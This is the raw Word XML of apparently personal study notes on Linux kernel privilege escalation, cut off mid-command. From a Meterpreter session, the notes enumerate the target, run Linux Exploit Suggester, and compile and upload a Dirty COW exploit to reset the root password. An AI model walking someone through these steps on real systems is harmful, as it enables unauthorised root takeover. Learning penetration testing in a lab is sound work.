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4343" w14:textId="72B40D5A" w:rsidR="00853ABF" w:rsidRPr="00867C22" w:rsidRDefault="00C839F6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00867C22">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Linux Kernel Exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1058FF4F" w14:textId="77777777" w:rsidR="00C839F6" w:rsidRDefault="00C839F6"/>
    <w:p w14:paraId="5DF1711E" w14:textId="2294EA57" w:rsidR="00B73823" w:rsidRPr="00B73823" w:rsidRDefault="00B73823">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B73823">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Privilege escalation method follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C099614" w14:textId="186FA79C" w:rsidR="00B73823" w:rsidRDefault="00B73823" w:rsidP="00B73823">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identify kernel vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC581B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FC581B" w:rsidRPr="00FC581B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tool:</w:t>
      </w:r>
      <w:r w:rsidR="00FC581B">
        <w:t xml:space="preserve"> Linux exploit suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD0FC08" w14:textId="464797CB" w:rsidR="00B73823" w:rsidRDefault="00B73823" w:rsidP="00B73823">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Downloading, compiling and transferring kernel exploit onto the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FCF715" w14:textId="3F87C284" w:rsidR="00FC581B" w:rsidRDefault="00FC581B"/>
    <w:p w14:paraId="705F4CA4" w14:textId="72B365E1" w:rsidR="00FC581B" w:rsidRDefault="00FC581B">
      <w:r>
        <w:t>Linux exploit suggester:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462ED254" w14:textId="1B38F298" w:rsidR="00FC581B" w:rsidRDefault="004206A8">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00BB626B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/The-Z-Labs/linux-exploit-suggester</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="017FE849" w14:textId="77777777" w:rsidR="004206A8" w:rsidRDefault="004206A8"/>
    <w:p w14:paraId="52CEBD37" w14:textId="4BF0FECF" w:rsidR="00FC581B" w:rsidRPr="004206A8" w:rsidRDefault="004206A8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004206A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB2C154" w14:textId="0180A576" w:rsidR="004206A8" w:rsidRDefault="00B55176">
      <w:r>
        <w:t xml:space="preserve">In kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and after the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38600137" w14:textId="56BA877E" w:rsidR="00B55176" w:rsidRDefault="00B55176">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00C86AC2" w14:textId="3528989A" w:rsidR="00B55176" w:rsidRDefault="00B55176">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="717322C9" wp14:editId="0FB63829">
            <wp:extent cx="2819545" cy="711237"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1570007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759" name="Picture 1" descr="A black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819545" cy="711237"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2D3498" w14:textId="65F3E1AE" w:rsidR="00226796" w:rsidRDefault="00B55176">
      <w:r>
        <w:t xml:space="preserve">Target is ubuntu </w:t>
      </w:r>
      <w:r w:rsidR="00EF3845">
        <w:t>distribution</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the kernel version is in the () brackets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F26C615" w14:textId="3D43A5EF" w:rsidR="00B55176" w:rsidRDefault="006012BD">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> # to check the privileges (give the account name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1C47E9" w14:textId="6DFF7F12" w:rsidR="006012BD" w:rsidRPr="006012BD" w:rsidRDefault="006012BD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006012BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>To check the privileges of the account:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A1CA14" w14:textId="3B837542" w:rsidR="006012BD" w:rsidRDefault="006012BD">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162F63B8" w14:textId="709335B4" w:rsidR="006012BD" w:rsidRDefault="006012BD">
      <w:r>
        <w:t>/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0360560A" w14:textId="2E6F1097" w:rsidR="006012BD" w:rsidRDefault="006012BD">
      <w:r>
        <w:t>Groups www-data # to check the part of which group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB76583" w14:textId="18B390BC" w:rsidR="006012BD" w:rsidRDefault="006012BD">
      <w:r>
        <w:t>Cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700AB4DE" w14:textId="080058E0" w:rsidR="006012BD" w:rsidRDefault="006012BD">
      <w:r>
        <w:t xml:space="preserve">Sudo apt-get update </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB30479" w14:textId="56CE909D" w:rsidR="006012BD" w:rsidRDefault="006012BD">
      <w:r>
        <w:t xml:space="preserve"># if it is not privileged account then it ask for password and not update the system.(as we </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>donot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> know the password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2562CCB2" w14:textId="77777777" w:rsidR="006012BD" w:rsidRDefault="006012BD"/>
    <w:p w14:paraId="03B22B42" w14:textId="3B2A6469" w:rsidR="006012BD" w:rsidRDefault="006012BD">
      <w:r>
        <w:t># we are targeting the root account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C79551F" w14:textId="4F3471B2" w:rsidR="006012BD" w:rsidRDefault="00EF3845">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B341261" w14:textId="4324E674" w:rsidR="00EF3845" w:rsidRDefault="00EF3845">
      <w:r>
        <w:t xml:space="preserve"># Go back to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A089ECB" w14:textId="77777777" w:rsidR="00EF3845" w:rsidRDefault="00EF3845"/>
    <w:p w14:paraId="7FB9AABE" w14:textId="6C8B1913" w:rsidR="00EF3845" w:rsidRDefault="00EF3845">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF3845">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3845">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3845">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit suggester:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429AE5F4" w14:textId="77777777" w:rsidR="00EF3845" w:rsidRPr="00EF3845" w:rsidRDefault="00EF3845">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58029E2D" w14:textId="4872BB33" w:rsidR="00EF3845" w:rsidRDefault="00EF3845">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="748467D2" wp14:editId="2A9F9F6F">
            <wp:extent cx="5543835" cy="1632034"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2112926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6126" name="Picture 2112926126"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5543835" cy="1632034"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E92E246" w14:textId="77777777" w:rsidR="006012BD" w:rsidRDefault="006012BD"/>
    <w:p w14:paraId="51052BCE" w14:textId="2C0FD7FD" w:rsidR="00EF3845" w:rsidRDefault="00EF3845">
      <w:r>
        <w:t>Cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="36EB521D" w14:textId="5F79C5AD" w:rsidR="00EF3845" w:rsidRDefault="00EF3845">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458CBBDF" w14:textId="1C387216" w:rsidR="00EF3845" w:rsidRDefault="00EF3845">
      <w:r>
        <w:t># on the other terminal  download the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3845">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3845">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit suggester</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” and then in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpeter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34187D30" w14:textId="30C14F0E" w:rsidR="00EF3845" w:rsidRDefault="00EF3845">
      <w:r>
        <w:t>Upload /desktop/les.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FD62C3" w14:textId="451EF6F0" w:rsidR="00EF3845" w:rsidRDefault="00EF3845">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443DD539" w14:textId="2BA3BE06" w:rsidR="00EF3845" w:rsidRDefault="00EF3845">
      <w:r>
        <w:t>/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D88B75B" w14:textId="1DA9280A" w:rsidR="00EF3845" w:rsidRDefault="00EF3845">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214D0C0E" w14:textId="48A76173" w:rsidR="00EF3845" w:rsidRDefault="00EF3845">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> +x les.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BFBA03" w14:textId="73F36E95" w:rsidR="00EF3845" w:rsidRDefault="00EF3845">
      <w:r>
        <w:t>Ls -alps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07882A2E" w14:textId="53A9896C" w:rsidR="00EF3845" w:rsidRDefault="00EF3845">
      <w:r>
        <w:t>./les.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EBA3CE" w14:textId="4842BEB2" w:rsidR="00EF3845" w:rsidRDefault="00EF3845">
      <w:r>
        <w:t># it enumerated the list of vulnerabilities that is in that kernel version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B941C76" w14:textId="3E62E539" w:rsidR="00EF3845" w:rsidRPr="00EF3845" w:rsidRDefault="00EF3845">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF3845">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Output of </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3845">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>./les.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3845">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A04AEDC" w14:textId="4481C5DF" w:rsidR="00EF3845" w:rsidRDefault="00EF3845">
      <w:r>
        <w:t>The exploit shown on the top have the higher chances of success.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A18B882" w14:textId="502A931C" w:rsidR="00EF3845" w:rsidRDefault="00EF3845">
      <w:r>
        <w:t>Tags: shows on which it runs the best.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6CF6E5" w14:textId="2F49560C" w:rsidR="00EF3845" w:rsidRDefault="007A1B57">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B76E33A" wp14:editId="6420FF56">
            <wp:extent cx="5486682" cy="2076557"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="139984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4747" name="Picture 139984747"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486682" cy="2076557"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4E3C89" w14:textId="03EA318B" w:rsidR="00EF3845" w:rsidRDefault="007A1B57">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A7B466F" wp14:editId="4727B4FC">
            <wp:extent cx="4584936" cy="2044805"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="10733192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19266"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584936" cy="2044805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C134B28" w14:textId="536CC73B" w:rsidR="007A1B57" w:rsidRDefault="007A1B57">
      <w:r w:rsidRPr="007A1B57">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dirty cow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the privilege escalation vulnerability in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> kernel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7224A003" w14:textId="476EAD4D" w:rsidR="007A1B57" w:rsidRDefault="007A1B57">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00E344A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://dirtycow.ninja/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65603BD4" w14:textId="53BF56FF" w:rsidR="007A1B57" w:rsidRDefault="007A1B57">
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00E344A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="32A339A6" w14:textId="77777777" w:rsidR="007A1B57" w:rsidRDefault="007A1B57"/>
    <w:p w14:paraId="433D9D98" w14:textId="18FDCDC9" w:rsidR="004774F5" w:rsidRDefault="004774F5">
      <w:r>
        <w:t>two methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B810A61" w14:textId="5DAE65F1" w:rsidR="004774F5" w:rsidRDefault="004774F5">
      <w:r>
        <w:t xml:space="preserve">you download the compiled it on the target system and then run it. </w:t>
      </w:r>
      <w:r w:rsidRPr="004774F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4081FBF2" w14:textId="6C1C065F" w:rsidR="007A1B57" w:rsidRDefault="004774F5">
      <w:r>
        <w:t>download and then compile</w:t>
      </w:r>
      <w:r w:rsidR="00C4483E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the code in attacker machine</w:t>
      </w:r>
      <w:r w:rsidR="00C4483E">
        <w:t xml:space="preserve"> and then transfer the </w:t>
      </w:r>
      <w:r>
        <w:t>binary</w:t>
      </w:r>
      <w:r w:rsidR="00C4483E">
        <w:t xml:space="preserve"> to the </w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidR="00C4483E">
        <w:t xml:space="preserve"> system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F09D73" w14:textId="34A34E91" w:rsidR="00C4483E" w:rsidRDefault="004774F5">
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00E344A8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/40839</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E61E6B7" w14:textId="27F525C6" w:rsidR="004774F5" w:rsidRDefault="004774F5">
      <w:r>
        <w:t>from here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6864B0E6" w14:textId="79754DDF" w:rsidR="006B2E6F" w:rsidRDefault="004774F5">
      <w:r>
        <w:t xml:space="preserve">As the code is in the c language so we require the </w:t>
      </w:r>
      <w:r w:rsidR="006B2E6F">
        <w:t xml:space="preserve">c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B2E6F">
        <w:t>compilar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B2E6F">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B2E6F">
        <w:t>Gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B2E6F">
        <w:t xml:space="preserve"> package which is GNU c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B2E6F">
        <w:t>compilar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B2E6F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A0CEAE" w14:textId="77777777" w:rsidR="006B2E6F" w:rsidRDefault="006B2E6F"/>
    <w:p w14:paraId="0A947F06" w14:textId="4839311C" w:rsidR="006B2E6F" w:rsidRDefault="006B2E6F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sudo apt-get install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72E7B31B" w14:textId="2D4EAA30" w:rsidR="006B2E6F" w:rsidRDefault="0006038C">
      <w:r>
        <w:t>Cd download # as the exploit is here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64898E05" w14:textId="318DDBCF" w:rsidR="0006038C" w:rsidRDefault="0006038C">
      <w:r>
        <w:t>Ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCB5E8F" w14:textId="29951B5F" w:rsidR="0006038C" w:rsidRDefault="0006038C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pthread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name_exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -o  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name_exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="750EC566" w14:textId="77777777" w:rsidR="0006038C" w:rsidRDefault="0006038C"/>
    <w:p w14:paraId="3C67A467" w14:textId="68C06247" w:rsidR="0006038C" w:rsidRDefault="0006038C">
      <w:r>
        <w:t>#transfer the created binary on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4126F980" w14:textId="7CBA83B2" w:rsidR="0006038C" w:rsidRDefault="0006038C">
      <w:r>
        <w:t>Upload ~/Download/</w:t>
      </w:r>
      <w:r w:rsidRPr="0006038C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name_exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3FB335E0" w14:textId="4C7F3AE9" w:rsidR="0006038C" w:rsidRDefault="0006038C">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303024E9" w14:textId="79CE7E87" w:rsidR="0006038C" w:rsidRDefault="0006038C">
      <w:r>
        <w:t>/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7DE93601" w14:textId="57E7EFEE" w:rsidR="0006038C" w:rsidRDefault="0006038C">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> +x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name_exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFFEA96" w14:textId="58A4A958" w:rsidR="00BD635A" w:rsidRDefault="00BD635A">
      <w:r>
        <w:t>./</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD635A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name_exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00326CDC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00326CDC">
        <w:t>(give the password that you want to set</w:t>
      </w:r>
      <w:r w:rsidR="00326CDC">
        <w:t xml:space="preserve"> as mention in the description of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00326CDC">
        <w:t>exploit_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00326CDC">
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0A129B" w14:textId="095ABED0" w:rsidR="0006038C" w:rsidRDefault="0006038C">
      <w:r>
        <w:t>#if it gives the error that is due to that it is not compiled on that target system</w:t>
      </w:r>
      <w:r w:rsidR="00BD635A">
        <w:t>, so to remove this error we upload the uncompiled file and then complied it on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138F79F9" w14:textId="77777777" w:rsidR="00BD635A" w:rsidRDefault="00BD635A"/>
    <w:p w14:paraId="79653E50" w14:textId="7B136CD4" w:rsidR="00BD635A" w:rsidRDefault="00BD635A" w:rsidP="00BD635A">
      <w:r>
        <w:t>Upload ~/Download/</w:t>
      </w:r>
      <w:r w:rsidRPr="0006038C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>name_exploit</w:t>
      </w:r>
      <w:r>
        <w:t>.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2A174FC0" w14:textId="2EEAB57A" w:rsidR="00BD635A" w:rsidRDefault="00BD635A" w:rsidP="00BD635A">
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769AC12B" w14:textId="18ADB595" w:rsidR="00BD635A" w:rsidRDefault="00BD635A" w:rsidP="00BD635A">
      <w:r>
        <w:t>/bin/bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="648FC64C" w14:textId="77777777" w:rsidR="00BD635A" w:rsidRDefault="00BD635A" w:rsidP="00BD635A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
